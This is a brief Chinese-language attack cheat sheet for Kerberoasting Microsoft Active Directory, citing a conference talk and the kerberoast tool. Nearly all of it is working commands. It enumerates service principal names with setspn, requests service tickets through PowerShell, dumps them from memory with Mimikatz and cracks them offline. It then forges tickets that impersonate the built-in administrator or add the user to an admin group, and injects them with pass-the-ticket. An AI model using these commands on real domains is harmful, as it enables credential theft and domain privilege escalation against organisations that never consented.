Kerberos攻击

参考：
1. http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/
2. https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
3. https://github.com/nidem/kerberoast

方法：
1. 查找服务账户

setspn -T DOMAINNAME -F -Q */*

2. 识别user账户，忽略机器账户，通常机器账户密码不太容易破解
3. 获得ticket

PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

原型是：

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -Arguemtlist “HTTP / YOURKERB SERVER”

4. 使用Mimikatz从RAM中获得tickets

mimikatz# kerberos::list /export

5. 离线破解服务口令

tgsrepcrack.py -w wordlist.txt *.kirbi

6. 将user伪装成另一个user

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500

或者把user加入一个组(本例为admin组)

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512

7. 使用Mimikatz注入内存

kerberos::ptt sql.kirbi